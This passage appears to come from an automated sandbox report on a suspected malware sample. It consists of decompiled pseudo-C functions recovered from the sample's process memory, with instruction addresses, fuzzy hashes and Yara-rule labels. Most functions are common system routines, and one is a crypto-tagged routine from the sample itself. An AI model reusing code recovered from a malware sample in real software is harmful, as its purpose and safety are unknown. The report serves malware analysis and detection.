				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x16fac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x16fac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x16fac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x16fac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x16fac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1806110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1806110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1806110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E0172B090(_v24, _t91, _v12, _t29);
			}

0x017e2d1f
0x017e2d2c
0x017e2d31
0x017e2d33
0x017e2d42
0x017e2d4b
0x017e2d51
0x017e2d5d
0x017e2d62
0x017e2d6e
0x017e2d71
0x017e2d7d
0x017e2d87
0x017e2d8d
0x017e2d91
0x017e2da5
0x017e2db7
0x017e2dc8
0x017e2dcf
0x017e2dd1
0x017e2dd3
0x017e2dd6
0x017e2ddb
0x017e2ddd
0x00000000
0x017e2ddf
0x017e2df5
0x017e2e0e
0x017e2e12
0x017e2e1a
0x017e2e1c
0x00000000
0x00000000
0x00000000
0x00000000
0x017e2e14
0x017e2e16
0x017e2e22
0x017e2e22
0x017e2e18
0x017e2e18
0x00000000
0x017e2e18
0x017e2e16
0x017e2df7
0x017e2df7
0x017e2dfc
0x017e2e04
0x017e2e06
0x017e2e1e
0x017e2e1e
0x00000000
0x00000000
0x00000000
0x00000000
0x017e2dfe
0x017e2e00
0x017e2e08
0x017e2e08
0x017e2e02
0x017e2e02
0x00000000
0x017e2e02
0x017e2e00
0x017e2dfc
0x00000000
0x017e2df5
0x017e2ddf
0x017e2e26
0x017e2e26
0x017e2e3c

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8560951dd31559a3f7e70677822f42f91c4d6a25984a2b257b44cc50e03bb605
Instruction ID: b167a3a310e8e1d9c866a8693bfd2269e46a0c0bf85047ac7881bfc842d94d12
Opcode Fuzzy Hash: 8560951dd31559a3f7e70677822f42f91c4d6a25984a2b257b44cc50e03bb605
Instruction Fuzzy Hash: 104139715001654FC711CB69C89C6BABFF9EF8D201B0A81EAD885DB247DA34C956C760

Uniqueness

Uniqueness Score: -1.00%

Function 017DEA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E017DEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01732280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E017DE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0171F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						L0172FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					L017DAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					L017DBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01737D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						L017CFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						L0172FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E017DA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x017dea55
0x017dea66
0x017dea68
0x017dea6c
0x017dea6f
0x017dea72
0x017dea75
0x017dea7a
0x017dea7a
0x017dea7e
0x017dea80
0x017dea85
0x017dea8b
0x017deab5
0x017deabc
0x017deabf
0x017deabf
0x017deaca
0x017deace
0x017dead0
0x017deae4
0x017deaeb
0x017deaf0
0x017deaf5
0x017deb09
0x017deb0d
0x017deb1d
0x017deb2d
0x017deb38
0x017deb3d
0x017deb41
0x017deb4a
0x017deb60
0x017deb4c
0x017deb52
0x017deb59
0x017deb59
0x017deb68
0x017deb71
0x017deb71
0x017dea8d
0x017dea8f
0x017dea92
0x017dea97
0x017dea97
0x017dea9b
0x017dea9c
0x017dea9e
0x017deaa6
0x017deaa6
0x017deb7e

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 36842923efa72c9518d1be714048e33361c58d74dd887b2390f1b7b2c3da26b5
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 5631A37260470A9BC71ADF28C884E6BF7BAFBC4610F04492DF5968B645DE30E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017969A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E017969A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x180d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01726C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01796BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01759980() >= 0) {
							E01732280(_t56, 0x1808778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1808774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1808774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(L0171B6F0(0x16fc338, 0x16fc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01759520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E017595D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					L0172FFB0(_t68, _t77, 0x1808778);
				}
				_pop(_t78);
				return L0175B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x017969b5
0x017969be
0x017969c3
0x017969c9
0x017969cc
0x017969d1
0x017969d3
0x017969de
0x017969e1
0x017969ea
0x017969f6
0x017969fe
0x01796a13
0x01796a14
0x01796a15
0x01796a16
0x01796a1e
0x01796a26
0x01796a31
0x01796a36
0x01796a37
0x01796a40
0x01796a49
0x01796a4a
0x01796a53
0x01796a59
0x01796a5d
0x01796a5e
0x01796a64
0x01796a67
0x01796a6a
0x01796a6d
0x01796a70
0x01796a77
0x01796a7d
0x01796a86
0x01796a89
0x01796a9c
0x01796a9f
0x01796aa2
0x01796aa5
0x01796aaf
0x01796ab1
0x01796ab8
0x01796ab9
0x01796abb
0x01796abe
0x01796ac5
0x01796ac5
0x01796aaf
0x01796a40
0x01796a26
0x017969fe
0x01796ace
0x01796ad0
0x01796ad3
0x01796ad8
0x01796adf
0x01796adf
0x01796ae8
0x01796aef
0x01796aef
0x01796af9
0x01796b06

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1ec21e4345f3f9c253710fce0d179541076bb1f43042565b47b744d50caf57f
Instruction ID: 0182f5424c5886654deb9742b38a8bf02394943a2794153a39a400c8b3556132
Opcode Fuzzy Hash: e1ec21e4345f3f9c253710fce0d179541076bb1f43042565b47b744d50caf57f
Instruction Fuzzy Hash: 7541AFB1D002099FDB15CFA9D840BFEFBF4EF48704F14822AE914A3244DB749A05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A81030 Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A81030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t55;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t55 = _t81;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t55 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x00a81030
0x00a8105b
0x00a8105d
0x00a81063
0x00a81065
0x00a81065
0x00a81071
0x00a81076
0x00a8107c
0x00a810ac
0x00a810ae
0x00a810b4
0x00a810ba
0x00a810bc
0x00a810bc
0x00a810cb
0x00a810d0
0x00a810d6
0x00a81101
0x00a81103
0x00a81109
0x00a8110f
0x00a81111
0x00a81111
0x00a81120
0x00a81128
0x00a8112b
0x00a8112e
0x00a8114f
0x00a81156
0x00a8115d
0x00a81169
0x00a8116c
0x00a8116f
0x00a81173

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: b7dacaf289125c92ff12086c8a3fe17c54bc45dd60cc701e01d6cefe78b06550
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 1B3180116587F10ED30E836D08BDA75AED18E9720174EC2FEDADA6F2F3C0888409D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 01715210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01715210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E017152A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017595D0();
							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0172EB70(_t54, 0x18079a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E017595D0();
								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0172EB70(_t54, 0x18079a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0175F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0172EB70(_t54, 0x18079a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017595D0();
							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x01715220
0x01715224
0x01770d13
0x01770d16
0x01770d19
0x0171522a
0x0171522a
0x0171522d
0x0171522d
0x01715231
0x01715235
0x01715239
0x01770d5c
0x01770d62
0x00000000
0x00000000
0x01770d6a
0x01770d7b
0x01770d7f
0x01770d81
0x01770d84
0x01770d95
0x01770d95
0x01770d6c
0x01770d71
0x01770d71
0x01770d9a
0x00000000
0x0171524a
0x0171524a
0x01715250
0x01770d24
0x01770d35
0x01770d39
0x01770d3b
0x01770d3e
0x01770d50
0x01770d50
0x01770d26
0x01770d2b
0x01770d2b
0x00000000
0x01770d55
0x01715256
0x0171525b
0x01715265
0x01770da7
0x0171526b
0x0171526e
0x01715272
0x01770db1
0x01770db4
0x01770dc5
0x01770dc5
0x01715272
0x01715278
0x0171527e
0x0171528a
0x0171528c
0x0171528d
0x00000000
0x01715280
0x01715282
0x01715288
0x0171529f
0x01715292
0x00000000
0x01715292
0x00000000
0x01715288
0x0171527e

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba29a3dfaf0f004da014a651f41e1c1eb92996ce0e3ff5ac490e1454cbf1e734
Instruction ID: 4105b546fe66a9795f6ebb0ea388e26eb42940198154fbf45c30429154b4bcfc
Opcode Fuzzy Hash: ba29a3dfaf0f004da014a651f41e1c1eb92996ce0e3ff5ac490e1454cbf1e734
Instruction Fuzzy Hash: A6314832245711EBCB269B1CC884F6AF7A5FF62720F104629F9554B299EB70F940C690

Uniqueness

Uniqueness Score: -1.00%

Function 01753D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01753D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01727B60(0, _t61, 0x16f11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01727B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01734620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01753d4c
0x01753d50
0x01753d55
0x01753d5e
0x0178e79a
0x00000000
0x0178e79a
0x01753d68
0x0178e789
0x01753d9d
0x01753da3
0x01753daf
0x01753db5
0x01753dbc
0x01753dc4
0x01753dc9
0x01753dce
0x0178e7ae
0x0178e7ae
0x01753dde
0x01753de2
0x01753de7
0x01753e0d
0x01753e13
0x01753e16
0x01753e1e
0x01753e25
0x01753e28
0x00000000
0x00000000
0x01753e2a
0x01753e2f
0x01753e37
0x01753e37
0x00000000
0x01753e37
0x01753e31
0x00000000
0x01753e31
0x01753e20
0x01753e20
0x01753e35
0x00000000
0x01753de9
0x01753de9
0x01753de9
0x01753dee
0x01753dfd
0x01753dff
0x01753e02
0x01753e05
0x01753e05
0x00000000
0x01753df0
0x01753de7
0x0178e78f
0x0178e794
0x01753d79
0x01753d84
0x01753d89
0x01753d8e
0x00000000
0x0178e7a4
0x01753d96
0x01753d9a
0x00000000
0x01753d9a
0x00000000
0x0178e794
0x01753d6e
0x01753d73
0x00000000
0x0178e7b5
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be4b443879c0450c20b3d9ee6abb86266c0709645d757f16c71ee273ac04f88
Instruction ID: 46fb0dd6e0ff7dcb23aa2daf8f0aeb7e62562a92df776cd361ec10105d51bef0
Opcode Fuzzy Hash: 8be4b443879c0450c20b3d9ee6abb86266c0709645d757f16c71ee273ac04f88
Instruction Fuzzy Hash: 2731DE31600615DBD7699F2EC841A7AFBF5FF99780B0580AEE945CB360EBB0D881D790

Uniqueness

Uniqueness Score: -1.00%

Function 0173C182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0173C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01737D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E017E8D34(_v8, _t80);
					}
					E01732280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						L0172FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E017E8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						L0172FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0175B180();
						if(_a4 != 0) {
							E01732280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0173BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0173BB2D(_t16, _t15);
						E0173B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						L0172FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							L0172FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					L0172FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0173c18d
0x0173c18f
0x0173c191
0x0173c19b
0x0173c1a0
0x0173c1d4
0x0173c1de
0x01782d6e
0x0173c1e4
0x0173c1e4
0x0173c1e4
0x0173c1ec
0x01782d7d
0x01782d7d
0x0173c1f3
0x0173c1ff
0x01782d88
0x01782d8d
0x01782d94
0x01782d94
0x01782d9f
0x01782da4
0x01782dab
0x01782db0
0x01782db2
0x01782db3
0x01782db4
0x01782dbc
0x01782dc3
0x01782dc3
0x0173c205
0x0173c205
0x0173c208
0x0173c20e
0x0173c211
0x0173c216
0x0173c219
0x0173c21f
0x0173c222
0x0173c22c
0x0173c234
0x0173c23a
0x0173c23f
0x0173c245
0x0173c24b
0x0173c251
0x0173c25a
0x0173c276
0x0173c27d
0x0173c27d
0x0173c25c
0x0173c25c
0x00000000
0x0173c25e
0x0173c1a4
0x0173c1aa
0x0173c1b3
0x0173c265
0x0173c26c
0x0173c26c
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 830743a260524f4313af58dd765ca0952eeb196fb22fac5dced4cb0263557a92
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: F6317AB160558BBED706EBB4C884BE9FBA4BF96200F04415BC51C97207CB346A4AD7E1

Uniqueness

Uniqueness Score: -1.00%

Function 01797016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01797016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x180d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
